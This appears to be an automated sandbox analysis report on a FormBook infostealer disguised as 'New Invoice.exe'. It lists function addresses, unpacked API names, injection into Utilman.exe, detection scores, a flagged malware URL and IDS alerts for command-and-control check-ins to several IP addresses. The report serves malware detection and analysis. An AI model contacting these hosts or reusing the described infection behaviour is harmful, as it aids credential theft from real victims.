Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013A0CF2	4_2_013A0CF2
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01450CB5	4_2_01450CB5
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01424F40	4_2_01424F40
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013D0F30	4_2_013D0F30
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013F2F28	4_2_013F2F28
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01452F30	4_2_01452F30
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013BCFE0	4_2_013BCFE0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0142EFA0	4_2_0142EFA0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013A2FC8	4_2_013A2FC8
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0146EE26	4_2_0146EE26
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013B0E59	4_2_013B0E59
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0146EEDB	4_2_0146EEDB
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013C2E90	4_2_013C2E90
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0146CE93	4_2_0146CE93
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0147B16B	4_2_0147B16B
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0139F172	4_2_0139F172
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013E516C	4_2_013E516C
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013BB1B0	4_2_013BB1B0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0145F0CC	4_2_0145F0CC
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0146F0E0	4_2_0146F0E0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_014670E9	4_2_014670E9
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013B70C0	4_2_013B70C0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0146132D	4_2_0146132D
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0139D34C	4_2_0139D34C
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013F739A	4_2_013F739A
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013B52A0	4_2_013B52A0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_014512ED	4_2_014512ED
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013CB2C0	4_2_013CB2C0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01467571	4_2_01467571
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_014795C3	4_2_014795C3
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0144D5B0	4_2_0144D5B0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013A1460	4_2_013A1460
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0146F43F	4_2_0146F43F
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0146F7B0	4_2_0146F7B0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013F5630	4_2_013F5630
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_014616CC	4_2_014616CC
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01445910	4_2_01445910
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013B9950	4_2_013B9950
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013CB950	4_2_013CB950
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0141D800	4_2_0141D800
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013B38E0	4_2_013B38E0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0146FB76	4_2_0146FB76
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01425BF0	4_2_01425BF0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013CFB80	4_2_013CFB80
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013EDBF9	4_2_013EDBF9
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01467A46	4_2_01467A46
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0146FA49	4_2_0146FA49
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01423A6C	4_2_01423A6C
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0145DAC6	4_2_0145DAC6
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013F5AA0	4_2_013F5AA0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01451AA3	4_2_01451AA3
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0144DAAC	4_2_0144DAAC
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01461D5A	4_2_01461D5A
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01467D73	4_2_01467D73
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013B3D40	4_2_013B3D40
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013CFDC0	4_2_013CFDC0
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01429C32	4_2_01429C32
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0146FCF2	4_2_0146FCF2
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0146FF09	4_2_0146FF09
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013B1F92	4_2_013B1F92
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01373FD5	4_2_01373FD5
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_01373FD2	4_2_01373FD2
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_0146FFB1	4_2_0146FFB1
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: 4_2_013B9EB0	4_2_013B9EB0
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Code function: 5_2_04F5263B	5_2_04F5263B
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Code function: 5_2_04F3384B	5_2_04F3384B
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Code function: 5_2_04F33A6B	5_2_04F33A6B
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Code function: 5_2_04F3A216	5_2_04F3A216
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Code function: 5_2_04F3A21B	5_2_04F3A21B
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Code function: 5_2_04F31BBB	5_2_04F31BBB
Source: C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\hDmn7H3zvRFO6rwhs5DOT.exe	Code function: 5_2_04F31BB9	5_2_04F31BB9
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050E0535	6_2_050E0535
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_051A0591	6_2_051A0591
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05184420	6_2_05184420
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05192446	6_2_05192446
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0518E4F6	6_2_0518E4F6
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05104750	6_2_05104750
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050E0770	6_2_050E0770
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050DC7C0	6_2_050DC7C0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050FC6E0	6_2_050FC6E0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050D0100	6_2_050D0100
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0517A118	6_2_0517A118
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05168158	6_2_05168158
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_051A01AA	6_2_051A01AA
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_051981CC	6_2_051981CC
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05172000	6_2_05172000
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0519A352	6_2_0519A352
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_051A03E6	6_2_051A03E6
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050EE3F0	6_2_050EE3F0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05180274	6_2_05180274
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_051602C0	6_2_051602C0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0517CD1F	6_2_0517CD1F
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050EAD00	6_2_050EAD00
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050F8DBF	6_2_050F8DBF
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050DADE0	6_2_050DADE0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050E0C00	6_2_050E0C00
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05180CB5	6_2_05180CB5
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050D0CF2	6_2_050D0CF2
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05100F30	6_2_05100F30
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05182F30	6_2_05182F30
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05122F28	6_2_05122F28
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05154F40	6_2_05154F40
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0515EFA0	6_2_0515EFA0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050D2FC8	6_2_050D2FC8
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050ECFE0	6_2_050ECFE0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0519EE26	6_2_0519EE26
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050E0E59	6_2_050E0E59
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0519CE93	6_2_0519CE93
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050F2E90	6_2_050F2E90
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0519EEDB	6_2_0519EEDB
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050F6962	6_2_050F6962
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050E29A0	6_2_050E29A0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_051AA9A6	6_2_051AA9A6
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050E2840	6_2_050E2840
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050EA840	6_2_050EA840
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050C68B8	6_2_050C68B8
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0510E8F0	6_2_0510E8F0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0519AB40	6_2_0519AB40
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05196BD7	6_2_05196BD7
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050DEA80	6_2_050DEA80
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05197571	6_2_05197571
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0517D5B0	6_2_0517D5B0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0519F43F	6_2_0519F43F
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050D1460	6_2_050D1460
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0519F7B0	6_2_0519F7B0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_051916CC	6_2_051916CC
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_051AB16B	6_2_051AB16B
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0511516C	6_2_0511516C
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050CF172	6_2_050CF172
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050EB1B0	6_2_050EB1B0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050E70C0	6_2_050E70C0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0518F0CC	6_2_0518F0CC
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_051970E9	6_2_051970E9
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0519F0E0	6_2_0519F0E0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0519132D	6_2_0519132D
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050CD34C	6_2_050CD34C
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0512739A	6_2_0512739A
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050E52A0	6_2_050E52A0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050FB2C0	6_2_050FB2C0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_051812ED	6_2_051812ED
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05191D5A	6_2_05191D5A
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050E3D40	6_2_050E3D40
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05197D73	6_2_05197D73
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050FFDC0	6_2_050FFDC0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05159C32	6_2_05159C32
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0519FCF2	6_2_0519FCF2
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0519FF09	6_2_0519FF09
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050E1F92	6_2_050E1F92
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0519FFB1	6_2_0519FFB1
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050A3FD2	6_2_050A3FD2
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050A3FD5	6_2_050A3FD5
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050E9EB0	6_2_050E9EB0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05175910	6_2_05175910
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050E9950	6_2_050E9950
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050FB950	6_2_050FB950
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0514D800	6_2_0514D800
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050E38E0	6_2_050E38E0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0519FB76	6_2_0519FB76
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_050FFB80	6_2_050FFB80
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05155BF0	6_2_05155BF0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0511DBF9	6_2_0511DBF9
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0519FA49	6_2_0519FA49
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05197A46	6_2_05197A46
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05153A6C	6_2_05153A6C
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05125AA0	6_2_05125AA0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0517DAAC	6_2_0517DAAC
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_05181AA3	6_2_05181AA3
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_0518DAC6	6_2_0518DAC6
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FC1E40	6_2_02FC1E40
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FBAF10	6_2_02FBAF10
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FBCF10	6_2_02FBCF10
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FBCCF0	6_2_02FBCCF0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FBB060	6_2_02FBB060
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FBB05E	6_2_02FBB05E
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FC36C0	6_2_02FC36C0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FC36BB	6_2_02FC36BB
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FC54B0	6_2_02FC54B0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_02FDBAE0	6_2_02FDBAE0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_053FE74E	6_2_053FE74E
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_053FE3B3	6_2_053FE3B3
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_053FE298	6_2_053FE298
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_053FD818	6_2_053FD818
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 6_2_053FE8DD	6_2_053FE8DD

Source: C:\Windows\SysWOW64\Utilman.exe	Code function: String function: 05115130 appears 58 times
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: String function: 0515F290 appears 105 times
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: String function: 05127E54 appears 102 times
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: String function: 050CB970 appears 278 times
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: String function: 0514EA12 appears 86 times
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: String function: 013F7E54 appears 111 times
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: String function: 0141EA12 appears 86 times
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: String function: 0142F290 appears 105 times
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: String function: 0139B970 appears 280 times
Source: C:\Users\user\Desktop\New Invoice.exe	Code function: String function: 013E5130 appears 58 times

Source: New Invoice.exe, 00000000.00000000.2023656169.0000000000862000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameuUut.exe@ vs New Invoice.exe
Source: New Invoice.exe, 00000000.00000002.2067645328.0000000006DE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs New Invoice.exe
Source: New Invoice.exe, 00000000.00000002.2063980765.0000000003C79000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs New Invoice.exe
Source: New Invoice.exe, 00000000.00000002.2069352622.0000000009EE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs New Invoice.exe
Source: New Invoice.exe, 00000000.00000002.2062747624.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs New Invoice.exe
Source: New Invoice.exe, 00000004.00000002.2233344490.000000000149D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs New Invoice.exe
Source: New Invoice.exe, 00000004.00000002.2232819132.0000000000F18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameutilman2.exej% vs New Invoice.exe
Source: New Invoice.exe	Binary or memory string: OriginalFilenameuUut.exe@ vs New Invoice.exe

Source: New Invoice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: New Invoice.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, EK5hK9oCWabKYcxdoC.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, EK5hK9oCWabKYcxdoC.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, EK5hK9oCWabKYcxdoC.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, EK5hK9oCWabKYcxdoC.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, bBN5f1W5eu358I6eM1.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, bBN5f1W5eu358I6eM1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.New Invoice.exe.9ee0000.5.raw.unpack, bBN5f1W5eu358I6eM1.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, bBN5f1W5eu358I6eM1.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, bBN5f1W5eu358I6eM1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, bBN5f1W5eu358I6eM1.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, EK5hK9oCWabKYcxdoC.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.New Invoice.exe.4722c78.1.raw.unpack, EK5hK9oCWabKYcxdoC.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, bBN5f1W5eu358I6eM1.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, bBN5f1W5eu358I6eM1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.New Invoice.exe.47ad898.0.raw.unpack, bBN5f1W5eu358I6eM1.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/2@17/12

Source: C:\Users\user\Desktop\New Invoice.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Invoice.exe.log

Source: http://www.366800008.xyz/oz5a/	Avira URL Cloud: Label: malware
Source: http://www.366800008.xyz/oz5a/?VRap=W8etfZTPq4Mlnpd&Dv=oeBzWQ4iNoo0v8vGmfOSihtFo8ZSdLGzCKJLwx0XZs10m0BgwOXofcl8PYTMqgD7GPCk9YKiSdzsZRYuWx0fzBu1xLrizdRRaz4Yf8ji9VfiHEOfolKa/6nG9d22pcDzQQ==	Avira URL Cloud: Label: malware

Source: New Invoice.exe	Virustotal: Detection: 68%			Perma Link
Source: New Invoice.exe	ReversingLabs: Detection: 68%

Source:	Binary string: Utilman.pdb source: New Invoice.exe, 00000004.00000002.2232819132.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, hDmn7H3zvRFO6rwhs5DOT.exe, 00000005.00000002.4483922392.000000000102E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: uUut.pdb source: New Invoice.exe
Source:	Binary string: uUut.pdbSHA256 source: New Invoice.exe
Source:	Binary string: wntdll.pdbUGP source: New Invoice.exe, 00000004.00000002.2233344490.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000006.00000002.4484888962.000000000523E000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000006.00000003.2235935036.0000000004EF4000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000006.00000003.2232692744.0000000004D44000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000006.00000002.4484888962.00000000050A0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: New Invoice.exe, New Invoice.exe, 00000004.00000002.2233344490.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, Utilman.exe, 00000006.00000002.4484888962.000000000523E000.00000040.00001000.00020000.00000000.sdmp, Utilman.exe, 00000006.00000003.2235935036.0000000004EF4000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000006.00000003.2232692744.0000000004D44000.00000004.00000020.00020000.00000000.sdmp, Utilman.exe, 00000006.00000002.4484888962.00000000050A0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Utilman.pdbGCTL source: New Invoice.exe, 00000004.00000002.2232819132.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, hDmn7H3zvRFO6rwhs5DOT.exe, 00000005.00000002.4483922392.000000000102E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hDmn7H3zvRFO6rwhs5DOT.exe, 00000005.00000002.4483399407.00000000003BF000.00000002.00000001.01000000.0000000C.sdmp, hDmn7H3zvRFO6rwhs5DOT.exe, 00000008.00000002.4483396231.00000000003BF000.00000002.00000001.01000000.0000000C.sdmp

Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 4x nop then xor eax, eax		6_2_02FB9EB0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 4x nop then mov ebx, 00000004h		6_2_053F04EE

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49805 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49905 -> 82.221.136.24:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49958 -> 82.221.136.24:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49939 -> 82.221.136.24:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 66.235.200.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 66.235.200.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 104.21.64.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50008 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 66.235.200.146:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50016 -> 192.64.118.221:80
